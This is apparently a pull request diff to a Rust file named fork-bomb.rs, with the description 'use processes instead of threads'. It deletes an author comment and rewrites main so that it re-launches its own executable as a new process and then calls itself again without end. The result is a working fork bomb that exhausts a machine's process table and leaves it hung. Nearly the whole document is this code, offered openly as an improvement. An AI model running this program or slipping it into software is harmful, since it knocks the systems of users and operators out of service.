### PR TITLE
improve rust fork bomb

### DIFF
--- a/fork-bomb.rs
+++ b/fork-bomb.rs
@@ -1,8 +1,7 @@
-// bomb.rs
-// Chad Sharp
-
 #[allow(unconditional_recursion)]
 fn main() {
-    std::thread::spawn(main);
+    std::process::Command::new(std::env::args().nth(0).unwrap())
+        .spawn()
+        .unwrap();
     main();
 }


### PR DESCRIPTION
use processes instead of threads